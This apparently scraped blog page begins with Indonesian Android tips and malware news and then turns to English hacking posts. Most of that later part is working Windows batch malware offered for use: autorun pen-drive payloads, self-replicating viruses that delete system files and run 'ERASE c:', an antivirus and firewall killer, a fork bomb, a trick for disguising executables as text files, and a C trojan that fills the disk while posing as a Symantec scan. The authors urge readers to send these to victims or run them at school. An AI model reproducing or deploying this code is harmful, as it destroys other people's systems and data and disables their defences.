Minggu, 01 April 2012

Keyboard Baru dan Shortcut Nomor Kontak Android

Pakai keyboard baru: Banyak aplikasi yang memungkinkan kamu untuk mengubah tata letak keyboard virtual. Namun, aplikasi atau keyboard baru itu harus diaktifkan dulu. Sebabnya, walaupun sudah diinstal, keyboard baru tidak secara otomatis dapat digunakan.

Untuk mengaktifkannya, coba jalankan salah satu aplikasi yang memerlukan keyboard dalam pengelolaannya, seperti SMS atau e-mail. Tap-tahan pada kotak isian teks, lalu pilih opsi [Input method] yang muncul. Pilih aplikasi keyboard baru yang sudah diinstal, maka layout baru keyboard akan diterapkan.

Shortcut nomor kontak: Jika ada nomor kontak yang sering dihubungi, kamu bisa menaruh nama kontak tersebut ke homescreen. Caranya, buka daftar kontak, lalu pilih salah satu nama kontak. Tap-tahan nama kontak tersebut hingga muncul pilihan. Pilih [Add to homescreen].

Mengganti Tampilan dan Cara Cepat Masuk ke Setting Android


Mengganti tampilan: Ada beberapa cara untuk mempersonalisasi tampilan ponsel Android kamu. Salah satu caranya adalah dengan mengganti wallpaper. Pada Android 2.2 ke atas, kamu bisa menggunakan wallpaper diam atau wallpaper beranimasi (live wallpaper).

Cara mengaktifkannya, tap-tahan layar homescreen, lalu pilih [Wallpapers]. Jika ingin menggunakan foto koleksi sebagai wallpaper, masuklah ke [Gallery] dan pilih foto. Untuk wallpaper animasi, pilih [Live Wallpapers] dan pilih dari wallpaper “hidup” yang tersedia.

Cara cepat masuk ke Setting: Ada beberapa cara untuk masuk ke aplikasi “Settings” yang mengatur semua setting sistem Android. Salah satunya adalah dengan menekan tombol menu di layar homescreen. Tombol ini biasanya berada di sisi paling kiri rangkaian tombol homescreen, namun setiap vendor memberikan ikon yang berbeda untuk tombol ini. Tap tombol tersebut, lalu pilih [Settings] untuk masuk ke settings. Pilih [Notifications] jika ingin masuk ke jendela notifikasi.

Membuat Shortcut Aplikasi dan Task Killer Bawaan Android


Membuat Shortcut Aplikasi: Jika ada satu aplikasi yang sering kamu pakai, kamu bisa membuat shortcut-nya di layar homescreen. Caranya, buka jendela berisi aplikasi-aplikasi yang terinstal, lalu tap-tahan aplikasi yang hendak dibuat shortcut-nya. Tunggu beberapa saat hingga layar homescreen muncul. Selanjutnya, lepaskan jarimu dari layar. Ikon shortcut apliakasi akan muncul. Untuk menghapus shortcut di homescreen, tap-tahan shortcut lalu tarik ke arah ikon recycle bin yang muncul.

Task Killer Bawaan: Banyak aplikasi yang bisa kamu gunakan agar mudah mematikan aplikasi yang sedang berjalan di belakang layar. Namun, sistem Android sebenarnya juga membawa fungsi tersebut. Untuk mengaktifkannya, masuk ke [Settings] > [Applications] > [Manage Applications] dan tap tab [Running]. Pilih salah satu aplikasi yang hendak dinonaktifkan, lalu pilih [Force Stop]. Cara lain, tekan-tahan tombol Home hingga muncul aplikasi yang sedang aktif, lalu pilih [Task Manager]. Pilih aplikasi, lalu tap [End].

Android Masih di Hantui Oleh Malware


Serangan malware saat ini masih membayangi pengguna Android. Para peneliti melaporkan hasil temuan baru mereka yang dijumpai di Android Market. Apa saja program jahat terbaru yang mereka temukan? Malware yang ditemukan oleh perusahaan keamanan Lookout in meruapakan varian baru dari DroidDream Light yang untungnya sudah dihapus oleh Google. Malware yang sempat hinggap di Android Market ini tersedia hanya dalam jangka waktu pendek dan jumlah pendownloadan hanya terbatas di angka 1.000-5.000. Aplikasi yang diketahui diterbitkan oleh pengembang bernama “Mobnet” ini ialah: Quick FallDown, Scientific Calculator, Bubble Buster, dan Best Compass and Leveler. Untuk mengecoh/menipu calon korbannya, si pelaku memberi nama yang hampir mirip dengan aplikasi resminya.

Malware ini memiliki kemampuan untuk melakukan pengunduhan aplikasi secara otomatis dan menggiring korban untuk mendownload aplikasi lain, mengunjungi situs jahat dan mendownload software yang ujung-ujungnya melakukan pengunduhan pada versi updatean malware tersebut.

Selain malware di atas, peneliti lain dari North Caroline State University juga menemukan malware Android yang bernama “HippoSMS”. Malware ini ditemukan di app markets negara China. Ia didesain untuk menyedot tagihan telpon dengan cara mengirimkan pesan SMS ke nomer tertentu. Tak hanya itu, malware itu juga bisa memblokir dan menghapus pesan yang dikirimkan operator pada konsumen yang berisi peringatan akan adanya tagihan tambahan. Sedang aplikasi lain yang merupakan versi dari Zitmo diketahui melakukan penyamaran menjadi aplikasi aktivasi bangking yang golnya adalah mencuri informasi finansial.

Untuk menghindari aplikasi jahat yang bertebaran, pengguna Android bisa melakukan upaya pencegahan dengan cara sebagai berikut:

1. Melakukan pendownloadan aplikasi hanya dari sumber terpercaya yang bisa dicek dari nama dan rating developernya.

2. Mengecek ijin (permission) yang diminta oleh aplikasi tersebut dan menggunakan insting untuk memastikan apakah ijin tersebut sesuai dengan fitur yang ditawarkan.

3. Waspada terhadap ‘gerak-gerik’ di ponsel yang mencurigakan, seperti aplikasi yang tiba-tiba terinstal, SMS yang terkirim pada penerima asing, atau panggilan telepon yang tiba-tiba dialihkan.

Bernavigasi Dengan Google Navigations Brut

Fungsi “Navigation” di Google Maps Android hanya dapat digunakan di Negara-negara tertentu saja. Padahal, dengan “Navigation”, kamu dapat menggunakan Google Maps untuk melakukan navigasi, seperti halnya perangkat navigasi mobil.

Untuk kawasan Indonesia, fungsi ini belum berlaku. Nah, seorang pengembang di forum xda-developers.com membuat sebuah aplikasi yang melepas keterbatasan ini. Fungsi Google Maps Navigation dapat dimanfaatkan secara optimal di Negara-negara lain di luar Negara yang didukung.

Google Navigations Brut adalah modifikasi Navigations. Untuk menggunakannya, kamu harus menggunakan koneksi internet mobile untuk mengakses peta Google Maps.

1. Download aplikasi dari www.multiupload.com/DDG9F5C643. Navigation Brut dapat digunakan mulai dari Android 1.6.

2. Transfer file .apk hasil download di PC ke ponsel dan install dengan bantuan aplikasi penginstal seperti AppInstaller yang tersedia di Android Market. Untuk menjalankan aplikasi inim buka jendela menu aplikasi, lalu tap Navigation [brut].

3. Kamu bisa mengetikan lokasi tujuan dengan meng-tap [Type Destination]. Ketikkan nama jalan atau lokasi yang hendak dituju, lalu tap [Go]. Jika lokasi tersebut ditemukan, aplikasi akan melakukan pembuatan rute.

4. Jika lokasi tidak dapat dipastikan atau ditemukan, aplikasi akan memberikan beberapa pilihan yang terkait dengan kata kunci yang dimasukkan. Pilih salah satu.

5. Google Navigation Brut akan langsung menampilkan menu navigasi, lengkap dengan jarak, rute (dalam map yang besar), dan panduan bersuara. Pastikan GPS sudah diaktifkan di ponsel.

Android Commander Untuk Mengontrol Aplikasi Android di PC


Android Commander atau yang sebelumnya dikenal dengan nama APK Manager adalah aplikasi yang berfungsi untuk mengontrol secara terus menerus aplikasi-aplikasi Android dan File dari PC. Jika menggunakan software ini kita tidak perlu memikirkan masalah memory karena Android Commander kapasitasnya kecil dan intuitif.

Intuitif karena Android Commander memiliki kemampuan mengetahui dan mngontrol aplikasi-aplikasi Android dan file-file dari PC tanpa mempelajarinya. Ditambah lagi software yang satu ini memiliki kecepatan operasi yang baik.

Fitur Android Commander:

- Menjelajah file dengan cara menyalin beberapa file antara telepon dan PC.
- Menghapus file-file dari telepon.
- Mengontrol Apliksai.
- Menyimpan file APK
- Instal ulang atau Uninstall.
- dan banyak lagi...

Klik dibawah ini untuk mendapatkannya...

Download Android Commander

Mobile Defense Untuk Keamanan Android


Salah satu hal yang paling ditakutkan pengguna smartphone adalah kehilangan ponselnya. Mungkin harga ponselnya tidak seberapa, tapi data di dalamnya bisa jadi melebihi harga ponselnya. Nah, buat pengguna Android, aplikasi Mobile Defense ini mungkin bisa membantu.

Fungsi Mobile Defense sebenarnya mirip remote control untuk smartphone. Kamu bisa melakukan perlindungan data dan fisik ponsel secara realtime. Fitur-fitur unik yang ada di Mobile Defense cocok untuk melindungi ponsel terutama saat berpindah tangan alias dicuri.

Blocking phone adalah fitur menarik pertama yang paling dikenal di aplikasi Android gratisan ini. Fitur ini online ketika ponsel kamu berpindah tangan. Tentu saja ponsel kamu yang hilang harus terhubung ke internet sebelum bisa melakukan hal ini. Bagaimana dengan dara? Mobile Defense juga bisa digunakan untuk mengambil data penting dari ponsel kamu ketika dibutuhkan, plus menghapus data-data penting secara remote.

Selain menghapus dan mengunci data penting, Mobile Defense juga punya fitur untuk memulihkan data yang hilang [recover] termasuk melakukan backup terhadap data, nomor kontak atau setelan ponsel. Satu lagi ini fitur Mobile Defense yang mesti kamu tahu, Phone Tracking alias pelacak ponsel. Kalau kamu tahu dimana saat ini ponsel kamu berada, tinggal buka situs Mobile Defense, masukkan ID kamu dan liat posisi ponsel kamu di peta yang tersedia.

Life360 Apliksai Untuk Android

Tidak banyak orang yang mengetahui aplikasi ini, padahal ia punya fungsi jempolan yang cukup berguna tidak hanya untuk orang yang menggunakan ponsel Android yang terinstall aplikasi ini, tapi juga untuk orang lain yang tergabung dalam komunitas Life360.

Life360 punya fitur andalan yang disebut dengan GPS Tracking. Fitur ini bekerja untuk mengetahui posisi seseorang yang memegang ponsel Android aktif secara real time. Biasanya dipakai untuk mengawasi anak-anak atau manula yang punya penyakit Alzheimer (lupa ingatan) karena posisi mereka bisa diketahui secara instan.

Tidak Cuma itu, dari database yang tersedia di Life360 kita bisa mengetahui beragam ancaman kejahatan yang ada di sekitar kita, termasuk ancaman orang-orang yang berada pada pengawasan GPS Tracking tadi. Dalam keadaan darurat, kita pun bisa meminta pertolongan terhadap

How to Set up your Pen Testing / Ethical Hacking Lab with a single Computer ?

Hi BTS readers,  We have provide you plenty of Ethical hacking and Pentesting tutorial, still more article is going to come.  Meanwhile, i like to teach you how to set up your own Pen Testing/ hacking network Lab.

Use of your own Pen Testing Lab:

  • Free, free ,free..! It's free lab, because it is yours..
  • Only one system is enough
  • can Practice your pentesting/hacking skills 
  • can install any kind of malwares(spyware,trojan) or RATs and test how it works
  • and more ...
is it possible to create a lab with single system?
Yes, you can. we are going to set up lot of vulnerable system virtually .  Confused? VirtualBox is open source software provided by Oracle corp that allows to run multiple guest OS(virtual system) in a single system . 

Requirements:
  • Virtual box latest version and its extension (get it from here: www.virtualbox.org/) 
  • Windows XP image file(xp.iso) ; it is going to be our target system
  • Backtrack Linux image file(backtrack5.iso); we are going to launch the attack from this OS.
First of all, Learn how to configure the Guest OS in VirtualBox from here:
https://www.virtualbox.org/manual/UserManual.html
This page will you explain everything about Virtualbox and how to setup Guest OS.

I hope you now familiar with installing Guest OS.


Set Up your Target system:

Now we have to set up the target system.  Install the Windows XP in VirtualBox using the xp.iso file.  After installation completed, disable the Firewall in xp so that it can become more vulnerable system.

Set up your PenTesting System:

Install the Backtrack5 in Virtualbox. Backtrack is penetration testing Linux that has lot of hacking tools .  We will hack the target system using this backtrack.

Network Settings for Guest Os:

Step 1:

click the File menu in Virtualbox and select Preference
Now select the Network Tab
Click the + symbol in the side that will add a new Host only network

Step2:


Right click on the Guest OX(eg:xp,backtrack) and select the Settings.

Select Network tab.
Now you can see the "Attached to" option menu.
change it from NAT to "Host only Adapter"
Do the same thing for both Guest OS.

Step 3:



Now run the both guest os .

Finding the IP address of Target System:

open the Windows XP Guest OS window.
open the cmd in Windows XP and type ipconfig
This will show the ip address of XP. It will be 192.168.56.101
Hacking with Pen Testing System:

open the Terminal  and type "nmap 192.168.56.101".
Now it will show the list of open port.

You can hack the target system with open ports.

Let me explain more details in my next article.

If you have trouble in installing or confused, comment here. 

XSS attacks practical examples ~ Cross site Scripting Exploits



Hello BTS readers,  So far i explained about XSS attacks and risks of this vulnerability; also i have provided guide to setup your own pentesting lab(using dvwa) to practice XSS attacks.

Dvwa is limited to few xss methods.  You may curious to know more about the practical examples for the XSS attacks. eHackingNews will help you to know more about the latest XSS attacks.

The XSS Vulnerability section in the EhackingNews covers the latest XSS attacks submitted by Security Experts and GreyHat hackers. This will give you an idea about the xss attack

How to Bypass Two-Step Authentication in Facebook?


A security researcher Christopher Lowson, has found a way to bypass the security feature called Two-Factor authentication.  If you login from unknown devices, Facebook will launch the Two-step authentication and asks users to enter code which is send to your phone.

When Lowson try to login into Facebook , the Facebook asked him enter Login approvals code. As he faced some inconvenience in mobile , he select the “I can’t get my code” and noticed “Skip this and stop asking me to enter codes”.

When he follow the skip option, Facebook asked “Log in without entering codes from now on?” .  This allowed him to completely disable the Turn off security codes.


"I bypassed the 2 step authentication code !! WTF? So in conclusion why have a 2 step authentication option when it can be disabled without having to enter it once before? Kinda defeats the purpose ? No?"Lowson said in his own blog post.

How to disable your victim's Mouse whenever he insert pen drive



Hi friends ,  Hacking is one of the fun .  You can attract your friends by simply doing some hacks before them.  You can also make your victims or enemies in confusion.  This article will help you to make the small fun with hack. 

 
Let's come to the point.  Today i am going to guide you how to disable your victim's or friend's (whoever) mouse,whenever he inserts  pen drive.  You can call it as virus which will disable the mouse.



How we are going to do?
    We are going to create this virus using our usual Batch programming.  In this post i am not only giving you simply the code but also explanation for the Batch program.   So I hope that this post will make you happy.

Batch Programming Code:

@echo off
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4

Explanation about this code
   "@echo off" This command will either turn ON, or OFF the command you put in a batch file from showing itself. (don't confuse now,batch programming intro will make you clear).

set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass" will access the registry stored in  this location"HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"

  you can manually go to this path: start->run and type as "regedit" now window will open . you can find folder named as "HKEY_LOCAL_MACHINE ,click the folder you can find list of folder also includes system folder.  likewise you can move to mouse class
Mouse Class Registry

The third line of our code is "reg delete %key%" . This will delete the key in the MouseClass from registry.

"reg add %key% /v Start /t REG_DWORD /d 4" creates a new key with
 Binary value name as "start" ,
type is "REG_DWORD"
and data as "4"   (actually the fore will be stored in hexadecimal format, 0×00000004).

The  Procedure to create this virus:
    Okay now we will see the what are the procedure to follow in order to make this virus perfectly work in victim pc. 

Step 1:
  1.    Copy the Batch code into notepad. 
  2.    Save it as .bat extension (for eg: clickme.bat)
Step 2: 
      Now open the notepad and copy this code:
[autorun]
Open=filename.bat
Action=Mouse Disable

   Save it as "autorun.inf"

//don't forget to change the "filname.bat" with your filname.bat.
Step 3:
         Then copy the two files in your pen drive or victim's pen drive.


That's all we have finished.  Now bring your pen drive to your friend or victim home.  Now whenever the mouse is inserted ,the mouse will be disabled.


How to recover from this attack?
        Sorry for mentioning this fun as attack.  To recover from this attack ,you can follow these steps:
Copy this code into the notepad:
@echo off
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 1


and save it with .bat extension(for eg: release.bat).
now open this batch will re-enable the mouse actions.

How to shutdown your victim's system using pen drive


In my last post i explained you about how to create a virus which will disable the mouse whenever pen drive inserted.  In this post i will help you to make the virus to make the system turned off whenever pen drive is inserted.
Step 1:
copy this code into notepad:
@echo off
shutdown -s -t 00

Save it with .bat extension (for eg: clickme.bat).

Step 2: 
      Now open the notepad and copy this code:

[autorun]
Open=filename.bat
Action=Mouse Disable

   Save it as "autorun.inf"

//don't forget to change the "filname.bat" with your filname.bat.
Step 3:
         Then copy the two files in your pen drive or victim's pen drive.

That's all whenever the victim insert his pen drive,the system will be turned off automatically.
    want any help ? or want to say thanks comment here

How to create a Dangerous virus using Batch programming?

How to create a Dangerous virus using Batch programming?



In this post i am going to give you dangerous virus code which is written in Batch Programming language.

Virus can do:
  • Copy itself into startup
  • Copy itself over one thousand times into random spots in your computer
  • Hide its self and all other created files
  • Task kill MSN, Norton, Windows Explorer, Limewire.
  • Swap the left mouse button with the right one
  • Opens alert boxes
  • Changes the time to 12:00 and shuts down the computer
Here is the Code:
@Echo off
color 4
title 4
title R.I.P
start
start
start
start calc
copy %0 %Systemroot%\Greatgame > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ
/d %systemroot%\Greatgame.bat /f > nul
copy %0 *.bat > nul
Attrib +r +h Greatgame.bat
Attrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
start
cls
cd %userprofile%\desktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
cd %userprofile%My Documents
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
start
start calc
cls
msg * R.I.P
msg * R.I.P
shutdown -r -t 10 -c "VIRUS DETECTED"
start
start
time 12:00
:R.I.P
cd %usernameprofile%\desktop
copy Greatgame.bat %random%.bat
goto RIP

copy this code into notepad and save as Greatgame.bat(while saving select all files instead of text ).

  Be careful..!! if you double click the batch file,then you are the victim of this virus

Try this in your school or college or in your friend computer.

Verry very Dangerous Virus Program using Batch Programming


Hi friends, here is another very very dangerous virus progrmming using Batch programming. This is very very danger than the previous virus code. So be careful than the before one.

Virus will do:
  • Copy itself for multiple times.
  • This will disable the restore option by deleting the restore file.
  • This will disable the login option.
  • If this affect the system, then the user can't use his OS longer.

start
color 5
title Your Fucked, lol
time 12:00
net stop "Security center"
net stop sharedaccess
netsh firewall set opmode mode-disable
start
echo copy %0 >> c:\autoexec.bat
copy %0 c:\windows\startm~1\Programs\StartUp\shroom.bat
Attrib +r +h C:\windows\startm~1\program\startup\shroom.bat
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> c:\regstart.reg
echo "systemStart"="c:\filename\virus.bat" >> c:\regstart.reg
start c:\regstart.reg
copy %0 %systemroot%\shroom.bat > nul
start
copy %0 *.bat > nul
start
attrib +r +h virus.bat
attrib +r +h
RUNDLL32 USER32.DLL,SwapMouseButton
tskill msnmsgr
tskill Limewire
tskill iexplorer
tskill NMain
tskill Firefox
tskill explorer
tskill AVGUARD
msg * Awww Your computer is now fucked
msg * You got owned!
msg * Say Bye to your computer n00b
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
del "C:\WINDOWS\pchealth\"
del "C:\WINDOWS\system\"
del "C:\WINDOWS\system32\restore\"
del "C:\WINDOWS\system32\logonui.exe"
del "C:\WINDOWS\system32\ntoskrnl.exe"
del "Winlogon.exe"
ERASE c:
start
shutdown - s -t 15 -c "15 Seconds and counting"
cd %userprofile%\Desktop
copy fixvirus.bat %userprofile%\Desktop
echo HAXHAXHAX
:LOOP
color 17
color 28
color 32
color 22
color 11
color 02
color 39
color 34
GOTO LOOP


Copy this code into notepad and save as shroom.bat(while saving select all files instead of text files)

A batch program to open the notepad file continuously

Hi friends, As usual  today also i am going to give you simple batch program to open the notepad continuously.  This is not at all going to harmful. But be careful.

Batch Code:
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top


Open the Notepad and paste this code.

Save the file with .bat extension(for eg: notepadhack.bat).

Now double clicking the file will open the notepad continuously.

Try this in your college or school system.

Or send to your enemies.


How this Program working:
Here ":top" is label. Label is like an address for someone.
"GOTO" gives simple meaning as go to that place. Means we are saying that go to the top label.
"START" code will start the exe file which is in that path.

Fake virus for making fun with your friends

Hi friends, you probably don't want to harm your friend pc but you like to fun with them.  If you think so, then you can use this fake virus.

Fake virus what i mean?
   This is not at all virus.  This is not at all make any effect.  It just shut down your friend system for only once and show  " your facebook account is hacked"(for fun only).


What is the code?
   So far we create a lot of virus using Batch programming .  This time also we are going to use our Batch programming. 

Code:
@echo off
msg * WARNING VIRUS DETECTED!!!!! AFTER 5 MINUTES YOUR FACEBOOK ACCOUNT WILL BE DELETED !!!!TO REMOVE THE VIRUS CLICK OK OR CLOSE THIS BOX!
PAUSE
shutdown -r -t 300 -c " SORRY!!! YOUR FACEBOOK ACCOUNT ARE NOW BEING DELETED !!! PLEASE WAIT ..........."

What you should do with this code?
      Copy this code and paste in notepad
       Save the file with .bat extension.(for eg: facebookhelp.bat)
       Now sent this file to your friend and ask to click.

What this will do?
  It will show first  "WARNING VIRUS DETECTED!!!!! AFTE.........." msg in cmd
  Then it will shutdown.  Before shutdown it will show "SORRY!!! YOUR ....." msg in cmd .

one line Virus creation using Batch Programming



1.Go to notepad,
2. Type
erase C:\WINDOWS
3. Save it with .bat extension ,
4. send to victim . once the victim open the file windows will be erased.

How to send the EXE file as text file?

1. First of all You have to download the TEXT ICON PACK .
You can Download It From Below:
Download


2. Extract the Icon Pack to Obtain the Text Icons.



3. Open a new file, Right click - New - Shortcut
Type the location of the item: "X:\WINDOWS\system32\cmd.exe /c file.txt" (where stands for "X"=Drive)

and name it "Readme.txt" (without quotes)

4. After creating the readme.txt file right click on it and choose - Properties
in the - "Start in" fill - "%currentdir%" , in the - "Run" choose - "Minimized".

5. Then change the icon with one of the TXT icons from the pack by right clicking the readme.txt file then -
Properties - Change Icon...

6. In order to execute a file you need one..
just change your Server/Virus extension to .TXT and name it - "file.txt"

Now you have a .TXT Shortcut and .TXT Executable, when opening the txt shortcut it opens a command
- "C:\WINDOWS\system32\cmd.exe /c test.txt" that executes the file you want.

7. Now the readme.txt executes a command window, in order to hide it Right click on the "readme.txt" and choose - Properties - Layout and reduced the size on the window to height=1 and width=1.
Now change the window position to height=999 and width=999.

8. Now you are ready to sent your virus as a txt file.

How to disable/delete your victim's Antivirus?


Here i am giving you the batch program to disable or delete the antivirus in victims computer.


@ echo off
rem --
rem Permanently Kill Anti-Virus
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*
cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmin
cls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*
cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:\Program Files\alwils~1\avast4\*.*
del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
del /Q /F C:\Program Files\kasper~1\*.exe
cls
del /Q /F C:\Program Files\trojan~1\*.exe
del /Q /F C:\Program Files\f-prot95\*.dll
del /Q /F C:\Program Files\tbav\*.dat
cls
del /Q /F C:\Program Files\avpersonal\*.vdf
del /Q /F C:\Program Files\Norton~1\*.cnt
del /Q /F C:\Program Files\Mcafee\*.*
cls
del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
del /Q /F C:\Program Files\Norton~1\*.*
cls
del /Q /F C:\Program Files\avgamsr\*.exe
del /Q /F C:\Program Files\avgamsvr\*.exe
del /Q /F C:\Program Files\avgemc\*.exe
cls
del /Q /F C:\Program Files\avgcc\*.exe
del /Q /F C:\Program Files\avgupsvc\*.exe
del /Q /F C:\Program Files\grisoft
del /Q /F C:\Program Files\nood32krn\*.exe
del /Q /F C:\Program Files\nood32\*.exe
cls
del /Q /F C:\Program Files\nod32
del /Q /F C:\Program Files\nood32
del /Q /F C:\Program Files\kav\*.exe
del /Q /F C:\Program Files\kavmm\*.exe
del /Q /F C:\Program Files\kaspersky\*.*
cls
del /Q /F C:\Program Files\ewidoctrl\*.exe
del /Q /F C:\Program Files\guard\*.exe
del /Q /F C:\Program Files\ewido\*.exe
cls
del /Q /F C:\Program Files\pavprsrv\*.exe
del /Q /F C:\Program Files\pavprot\*.exe
del /Q /F C:\Program Files\avengine\*.exe
cls
del /Q /F C:\Program Files\apvxdwin\*.exe
del /Q /F C:\Program Files\webproxy\*.exe
del /Q /F C:\Program Files\panda software\*.*
rem --

Copy this code to notepad
Save it with .bat extension(for eg antdis.bat)
send to your victim.

Create a virus to make the computer freezed using Batch Programming


Now i am going to give you simple and only one line Batch code. Special about this virus is that easy to remember the code. So it will be useful to use in college or school.

  This is for newbie. This virus is harmful for CPU. So be careful. Don't run this in your pc or friend pc.

Open a notepad.


  • copy this code to notepad:

%0|%0

  • Save the file with .bat extension(For eg: music.bat)
  • That's all once your victim clicked this file,the CPU will be overloaded.
  • Don't worry it will be come to normal operation after restarting.

If you are doing this in your college or school,you can try this:

  • copy this bat file to any drive.
  • Create shortcut to desktop(by right click and sent to desktop).
  • Now go to desktop and right click on the shortcut.
  • Select Properties.
  • Click the Change icon.
  • Select any icon which will attract users.
  • and click ok.

Screen shots for reference:




Create a virus to create a infinite folder in a drive


Hi Hackers, this batch code will very helpful for you.  This is simple and effective virus code.

As usual open notepad.
Copy this code to Notepad.
@echo off
:top
md %random%
goto top
 @echo off makes it so that it appears to be a blank screen but actually its making hundreds of folder.
md %random% is command that creating folders with random names.
goto top – return to label :top , infinite loop


Save the file with .bat extension(for eg: folderscreate.bat)

That's all if you double click the file it will create a finite folder wherever the batch file is.

C program Memory Space Eater virus


Hi friends this is BreakTheSec. I am going to giveyou C program to eat the memory in Hard drive. This virus is able to eat the memory space 1 GB per minute. So Becareful with this virus.



#include<stdio.h>
#include<conio.h>
#include<dos.h>
#include<stdlib.h>
FILE *a,*t,*b;
int r,status,vir_count;
double i;
char ch[]="CREATING A HUGE FILE FOR OCCUPYING HARDDISK SPACE",choice;

void eatspace(void);
void findroot(void);
void showstatus(void);
void draw(void);
void accept(void);

void main()
{
draw();
accept();
textcolor(WHITE);
draw();
gotoxy(12,8);
cputs("ANALYZING YOUR SYSTEM. PLEASE WAIT...");
sleep(3);
gotoxy(12,8);
delline();
cputs("PRESS ANY KEY TO START THE SYSTEM SCAN...");
getch();
gotoxy(12,8);
delline();
findroot();
}

void accept()
{
textcolor(LIGHTRED);
gotoxy(1,8);
cputs("THIS PROGRAM IS A DEMO OF SIMPLE TROJAN HORSE. IF YOU RUN THIS PROGRAM IT WILL\n\rEAT UP YOUR FULL HARD DISK SPACE ON ROOT DRIVE. HOWEVER IT IS POSSIBLE TO\n\rELIMINATE THE DAMAGE.\n\n\rTO CLEANUP THE DAMAGE YOU\'VE TO DELETE THE FILE \"spceshot.dll\" LOCATED IN\n\n\r \"%windir%\\System32\".\n\n\rIF YOU WISH TO RUN THE PROGRAM PRESS ENTER, OTHERWISE PRESS ANY KEY TO QUIT.");

if((choice=getch())!=13)
exit(0);
}

void draw()
{
clrscr();
textcolor(WHITE);
gotoxy(12,2);
cputs("********************************************************");
gotoxy(12,6);
cputs("********************************************************");
gotoxy(12,3);
cputs("*\n\b*\n\b*\n\b");
gotoxy(67,3);
cputs("*\n\b*\n\b*\n\b");
gotoxy(14,4);
cputs("SYMANTEC SECURITY SCAN - 2009 (QUICK SYSTEM SCANNER)");
}

void findroot()
{
t=fopen("C:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
textcolor(WHITE);
a=fopen("C:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("C:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
t=fopen("D:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
a=fopen("D:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("D:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
t=fopen("E:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
a=fopen("E:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("E:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
t=fopen("F:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
